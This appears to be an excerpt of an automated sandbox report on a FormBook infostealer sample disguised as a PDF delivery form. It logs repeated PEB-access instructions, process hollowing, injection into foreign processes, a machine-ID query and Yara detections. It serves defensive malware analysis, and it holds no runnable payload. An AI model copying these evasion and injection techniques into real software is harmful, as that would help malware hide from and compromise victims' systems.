Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A78AA0 mov eax, dword ptr fs:[00000030h]	5_2_22A78AA0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A78AA0 mov eax, dword ptr fs:[00000030h]	5_2_22A78AA0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AC6AA4 mov eax, dword ptr fs:[00000030h]	5_2_22AC6AA4
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A7EA80 mov eax, dword ptr fs:[00000030h]	5_2_22A7EA80
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A7EA80 mov eax, dword ptr fs:[00000030h]	5_2_22A7EA80
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A7EA80 mov eax, dword ptr fs:[00000030h]	5_2_22A7EA80
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A7EA80 mov eax, dword ptr fs:[00000030h]	5_2_22A7EA80
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A7EA80 mov eax, dword ptr fs:[00000030h]	5_2_22A7EA80
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A7EA80 mov eax, dword ptr fs:[00000030h]	5_2_22A7EA80
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A7EA80 mov eax, dword ptr fs:[00000030h]	5_2_22A7EA80
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A7EA80 mov eax, dword ptr fs:[00000030h]	5_2_22A7EA80
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A7EA80 mov eax, dword ptr fs:[00000030h]	5_2_22A7EA80
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B44A80 mov eax, dword ptr fs:[00000030h]	5_2_22B44A80
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AA8A90 mov edx, dword ptr fs:[00000030h]	5_2_22AA8A90
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AAAAEE mov eax, dword ptr fs:[00000030h]	5_2_22AAAAEE
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AAAAEE mov eax, dword ptr fs:[00000030h]	5_2_22AAAAEE
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AC6ACC mov eax, dword ptr fs:[00000030h]	5_2_22AC6ACC
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AC6ACC mov eax, dword ptr fs:[00000030h]	5_2_22AC6ACC
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AC6ACC mov eax, dword ptr fs:[00000030h]	5_2_22AC6ACC
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A70AD0 mov eax, dword ptr fs:[00000030h]	5_2_22A70AD0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AA4AD0 mov eax, dword ptr fs:[00000030h]	5_2_22AA4AD0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AA4AD0 mov eax, dword ptr fs:[00000030h]	5_2_22AA4AD0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A9EA2E mov eax, dword ptr fs:[00000030h]	5_2_22A9EA2E
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AACA24 mov eax, dword ptr fs:[00000030h]	5_2_22AACA24
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AACA38 mov eax, dword ptr fs:[00000030h]	5_2_22AACA38
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A94A35 mov eax, dword ptr fs:[00000030h]	5_2_22A94A35
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A94A35 mov eax, dword ptr fs:[00000030h]	5_2_22A94A35
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AFCA11 mov eax, dword ptr fs:[00000030h]	5_2_22AFCA11
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AACA6F mov eax, dword ptr fs:[00000030h]	5_2_22AACA6F
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AACA6F mov eax, dword ptr fs:[00000030h]	5_2_22AACA6F
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AACA6F mov eax, dword ptr fs:[00000030h]	5_2_22AACA6F
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B1EA60 mov eax, dword ptr fs:[00000030h]	5_2_22B1EA60
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AECA72 mov eax, dword ptr fs:[00000030h]	5_2_22AECA72
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AECA72 mov eax, dword ptr fs:[00000030h]	5_2_22AECA72
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A80A5B mov eax, dword ptr fs:[00000030h]	5_2_22A80A5B
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A80A5B mov eax, dword ptr fs:[00000030h]	5_2_22A80A5B
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A76A50 mov eax, dword ptr fs:[00000030h]	5_2_22A76A50
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A76A50 mov eax, dword ptr fs:[00000030h]	5_2_22A76A50
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A76A50 mov eax, dword ptr fs:[00000030h]	5_2_22A76A50
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A76A50 mov eax, dword ptr fs:[00000030h]	5_2_22A76A50
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A76A50 mov eax, dword ptr fs:[00000030h]	5_2_22A76A50
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A76A50 mov eax, dword ptr fs:[00000030h]	5_2_22A76A50
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A76A50 mov eax, dword ptr fs:[00000030h]	5_2_22A76A50
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B24BB0 mov eax, dword ptr fs:[00000030h]	5_2_22B24BB0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B24BB0 mov eax, dword ptr fs:[00000030h]	5_2_22B24BB0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A80BBE mov eax, dword ptr fs:[00000030h]	5_2_22A80BBE
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A80BBE mov eax, dword ptr fs:[00000030h]	5_2_22A80BBE
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A9EBFC mov eax, dword ptr fs:[00000030h]	5_2_22A9EBFC
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A78BF0 mov eax, dword ptr fs:[00000030h]	5_2_22A78BF0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A78BF0 mov eax, dword ptr fs:[00000030h]	5_2_22A78BF0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A78BF0 mov eax, dword ptr fs:[00000030h]	5_2_22A78BF0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AFCBF0 mov eax, dword ptr fs:[00000030h]	5_2_22AFCBF0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B1EBD0 mov eax, dword ptr fs:[00000030h]	5_2_22B1EBD0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A90BCB mov eax, dword ptr fs:[00000030h]	5_2_22A90BCB
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A90BCB mov eax, dword ptr fs:[00000030h]	5_2_22A90BCB
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A90BCB mov eax, dword ptr fs:[00000030h]	5_2_22A90BCB
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A70BCD mov eax, dword ptr fs:[00000030h]	5_2_22A70BCD
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A70BCD mov eax, dword ptr fs:[00000030h]	5_2_22A70BCD
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A70BCD mov eax, dword ptr fs:[00000030h]	5_2_22A70BCD
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A9EB20 mov eax, dword ptr fs:[00000030h]	5_2_22A9EB20
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A9EB20 mov eax, dword ptr fs:[00000030h]	5_2_22A9EB20
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B38B28 mov eax, dword ptr fs:[00000030h]	5_2_22B38B28
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B38B28 mov eax, dword ptr fs:[00000030h]	5_2_22B38B28
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AEEB1D mov eax, dword ptr fs:[00000030h]	5_2_22AEEB1D
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AEEB1D mov eax, dword ptr fs:[00000030h]	5_2_22AEEB1D
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AEEB1D mov eax, dword ptr fs:[00000030h]	5_2_22AEEB1D
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AEEB1D mov eax, dword ptr fs:[00000030h]	5_2_22AEEB1D
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AEEB1D mov eax, dword ptr fs:[00000030h]	5_2_22AEEB1D
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AEEB1D mov eax, dword ptr fs:[00000030h]	5_2_22AEEB1D
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AEEB1D mov eax, dword ptr fs:[00000030h]	5_2_22AEEB1D
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AEEB1D mov eax, dword ptr fs:[00000030h]	5_2_22AEEB1D
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AEEB1D mov eax, dword ptr fs:[00000030h]	5_2_22AEEB1D
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A6CB7E mov eax, dword ptr fs:[00000030h]	5_2_22A6CB7E
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B1EB50 mov eax, dword ptr fs:[00000030h]	5_2_22B1EB50
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B06B40 mov eax, dword ptr fs:[00000030h]	5_2_22B06B40
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B06B40 mov eax, dword ptr fs:[00000030h]	5_2_22B06B40
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B3AB40 mov eax, dword ptr fs:[00000030h]	5_2_22B3AB40
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B18B42 mov eax, dword ptr fs:[00000030h]	5_2_22B18B42
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B24B4B mov eax, dword ptr fs:[00000030h]	5_2_22B24B4B
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B24B4B mov eax, dword ptr fs:[00000030h]	5_2_22B24B4B
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A70887 mov eax, dword ptr fs:[00000030h]	5_2_22A70887
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AFC89D mov eax, dword ptr fs:[00000030h]	5_2_22AFC89D
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AAC8F9 mov eax, dword ptr fs:[00000030h]	5_2_22AAC8F9
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AAC8F9 mov eax, dword ptr fs:[00000030h]	5_2_22AAC8F9
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B3A8E4 mov eax, dword ptr fs:[00000030h]	5_2_22B3A8E4
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A9E8C0 mov eax, dword ptr fs:[00000030h]	5_2_22A9E8C0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B1483A mov eax, dword ptr fs:[00000030h]	5_2_22B1483A
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B1483A mov eax, dword ptr fs:[00000030h]	5_2_22B1483A
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AAA830 mov eax, dword ptr fs:[00000030h]	5_2_22AAA830
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A92835 mov eax, dword ptr fs:[00000030h]	5_2_22A92835
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A92835 mov eax, dword ptr fs:[00000030h]	5_2_22A92835
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A92835 mov eax, dword ptr fs:[00000030h]	5_2_22A92835
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A92835 mov ecx, dword ptr fs:[00000030h]	5_2_22A92835
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A92835 mov eax, dword ptr fs:[00000030h]	5_2_22A92835
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A92835 mov eax, dword ptr fs:[00000030h]	5_2_22A92835
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AFC810 mov eax, dword ptr fs:[00000030h]	5_2_22AFC810
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B06870 mov eax, dword ptr fs:[00000030h]	5_2_22B06870
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B06870 mov eax, dword ptr fs:[00000030h]	5_2_22B06870
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AFE872 mov eax, dword ptr fs:[00000030h]	5_2_22AFE872
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AFE872 mov eax, dword ptr fs:[00000030h]	5_2_22AFE872
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A82840 mov ecx, dword ptr fs:[00000030h]	5_2_22A82840
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A74859 mov eax, dword ptr fs:[00000030h]	5_2_22A74859
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A74859 mov eax, dword ptr fs:[00000030h]	5_2_22A74859
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AA0854 mov eax, dword ptr fs:[00000030h]	5_2_22AA0854
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A829A0 mov eax, dword ptr fs:[00000030h]	5_2_22A829A0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A829A0 mov eax, dword ptr fs:[00000030h]	5_2_22A829A0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A829A0 mov eax, dword ptr fs:[00000030h]	5_2_22A829A0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A829A0 mov eax, dword ptr fs:[00000030h]	5_2_22A829A0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A829A0 mov eax, dword ptr fs:[00000030h]	5_2_22A829A0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A829A0 mov eax, dword ptr fs:[00000030h]	5_2_22A829A0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A829A0 mov eax, dword ptr fs:[00000030h]	5_2_22A829A0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A829A0 mov eax, dword ptr fs:[00000030h]	5_2_22A829A0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A829A0 mov eax, dword ptr fs:[00000030h]	5_2_22A829A0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A829A0 mov eax, dword ptr fs:[00000030h]	5_2_22A829A0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A829A0 mov eax, dword ptr fs:[00000030h]	5_2_22A829A0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A829A0 mov eax, dword ptr fs:[00000030h]	5_2_22A829A0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A829A0 mov eax, dword ptr fs:[00000030h]	5_2_22A829A0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A709AD mov eax, dword ptr fs:[00000030h]	5_2_22A709AD
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A709AD mov eax, dword ptr fs:[00000030h]	5_2_22A709AD
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AF89B3 mov esi, dword ptr fs:[00000030h]	5_2_22AF89B3
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AF89B3 mov eax, dword ptr fs:[00000030h]	5_2_22AF89B3
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AF89B3 mov eax, dword ptr fs:[00000030h]	5_2_22AF89B3
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AFE9E0 mov eax, dword ptr fs:[00000030h]	5_2_22AFE9E0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AA29F9 mov eax, dword ptr fs:[00000030h]	5_2_22AA29F9
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AA29F9 mov eax, dword ptr fs:[00000030h]	5_2_22AA29F9
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B3A9D3 mov eax, dword ptr fs:[00000030h]	5_2_22B3A9D3
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B069C0 mov eax, dword ptr fs:[00000030h]	5_2_22B069C0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A7A9D0 mov eax, dword ptr fs:[00000030h]	5_2_22A7A9D0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A7A9D0 mov eax, dword ptr fs:[00000030h]	5_2_22A7A9D0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A7A9D0 mov eax, dword ptr fs:[00000030h]	5_2_22A7A9D0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A7A9D0 mov eax, dword ptr fs:[00000030h]	5_2_22A7A9D0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A7A9D0 mov eax, dword ptr fs:[00000030h]	5_2_22A7A9D0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A7A9D0 mov eax, dword ptr fs:[00000030h]	5_2_22A7A9D0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AA49D0 mov eax, dword ptr fs:[00000030h]	5_2_22AA49D0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AF892A mov eax, dword ptr fs:[00000030h]	5_2_22AF892A
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B0892B mov eax, dword ptr fs:[00000030h]	5_2_22B0892B
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AEE908 mov eax, dword ptr fs:[00000030h]	5_2_22AEE908
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AEE908 mov eax, dword ptr fs:[00000030h]	5_2_22AEE908
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AFC912 mov eax, dword ptr fs:[00000030h]	5_2_22AFC912
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A68918 mov eax, dword ptr fs:[00000030h]	5_2_22A68918
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A68918 mov eax, dword ptr fs:[00000030h]	5_2_22A68918
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AB096E mov eax, dword ptr fs:[00000030h]	5_2_22AB096E
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AB096E mov edx, dword ptr fs:[00000030h]	5_2_22AB096E
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AB096E mov eax, dword ptr fs:[00000030h]	5_2_22AB096E
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B14978 mov eax, dword ptr fs:[00000030h]	5_2_22B14978
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B14978 mov eax, dword ptr fs:[00000030h]	5_2_22B14978
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A96962 mov eax, dword ptr fs:[00000030h]	5_2_22A96962
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A96962 mov eax, dword ptr fs:[00000030h]	5_2_22A96962
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A96962 mov eax, dword ptr fs:[00000030h]	5_2_22A96962
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AFC97C mov eax, dword ptr fs:[00000030h]	5_2_22AFC97C
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AF0946 mov eax, dword ptr fs:[00000030h]	5_2_22AF0946
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B0AEB0 mov eax, dword ptr fs:[00000030h]	5_2_22B0AEB0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22B0AEB0 mov eax, dword ptr fs:[00000030h]	5_2_22B0AEB0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AFCEA0 mov eax, dword ptr fs:[00000030h]	5_2_22AFCEA0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AFCEA0 mov eax, dword ptr fs:[00000030h]	5_2_22AFCEA0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AFCEA0 mov eax, dword ptr fs:[00000030h]	5_2_22AFCEA0
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AA2E9C mov eax, dword ptr fs:[00000030h]	5_2_22AA2E9C
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22AA2E9C mov ecx, dword ptr fs:[00000030h]	5_2_22AA2E9C
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A6AE90 mov eax, dword ptr fs:[00000030h]	5_2_22A6AE90
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Code function: 5_2_22A6AE90 mov eax, dword ptr fs:[00000030h]	5_2_22A6AE90

HIPS / PFW / Operating System Protection Evasion

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Memory allocated: C:\Users\Public\Libraries\xnxcxbpC.pif base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Memory allocated: C:\Users\Public\Libraries\xnxcxbpC.pif base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Memory allocated: C:\Users\Public\Libraries\xnxcxbpC.pif base: 400000 protect: page execute and read and write	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Section loaded: NULL target: C:\Users\Public\Libraries\Cpbxcxnx.PIF protection: execute and read and write	Jump to behavior
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Section loaded: NULL target: C:\Users\Public\Libraries\Cpbxcxnx.PIF protection: execute and read and write	Jump to behavior
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Section loaded: NULL target: C:\Users\Public\Libraries\Cpbxcxnx.PIF protection: execute and read and write	Jump to behavior
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Section loaded: NULL target: C:\Users\Public\Libraries\Cpbxcxnx.PIF protection: execute and read and write	Jump to behavior
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Section loaded: NULL target: C:\Users\Public\Libraries\Cpbxcxnx.PIF protection: execute and read and write	Jump to behavior
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Section loaded: NULL target: C:\Users\Public\Libraries\Cpbxcxnx.PIF protection: execute and read and write	Jump to behavior
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Section loaded: NULL target: C:\Users\Public\Libraries\Cpbxcxnx.PIF protection: execute and read and write	Jump to behavior
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Section loaded: NULL target: C:\Users\Public\Libraries\Cpbxcxnx.PIF protection: execute and read and write	Jump to behavior
Source: C:\Users\Public\Libraries\xnxcxbpC.pif	Section loaded: NULL target: C:\Users\Public\Libraries\Cpbxcxnx.PIF protection: execute and read and write	Jump to behavior

Sample uses process hollowing technique

Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Section unmapped: C:\Users\Public\Libraries\xnxcxbpC.pif base address: 400000	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section unmapped: C:\Users\Public\Libraries\xnxcxbpC.pif base address: 400000	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Section unmapped: C:\Users\Public\Libraries\xnxcxbpC.pif base address: 400000	Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Memory written: C:\Users\Public\Libraries\xnxcxbpC.pif base: 253008	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Memory written: C:\Users\Public\Libraries\xnxcxbpC.pif base: 2AC008	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Memory written: C:\Users\Public\Libraries\xnxcxbpC.pif base: 253008	Jump to behavior

Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Process created: C:\Users\Public\Libraries\xnxcxbpC.pif C:\Users\Public\Libraries\xnxcxbpC.pif	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Process created: C:\Users\Public\Libraries\xnxcxbpC.pif C:\Users\Public\Libraries\xnxcxbpC.pif	Jump to behavior
Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF	Process created: C:\Users\Public\Libraries\xnxcxbpC.pif C:\Users\Public\Libraries\xnxcxbpC.pif	Jump to behavior

Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,	0_2_02CD5A78
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Code function: GetLocaleInfoA,	0_2_02CDA798
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Code function: GetLocaleInfoA,	0_2_02CDA74C
Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Code function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,	0_2_02CD5B84

Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe

Code function: 0_2_02CD9194 GetLocalTime,

0_2_02CD9194

Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe

Code function: 0_2_02CDB714 GetVersionExA,

0_2_02CDB714

Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 18.2.xnxcxbpC.pif.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.xnxcxbpC.pif.400000.0.unpack, type: UNPACKEDPE
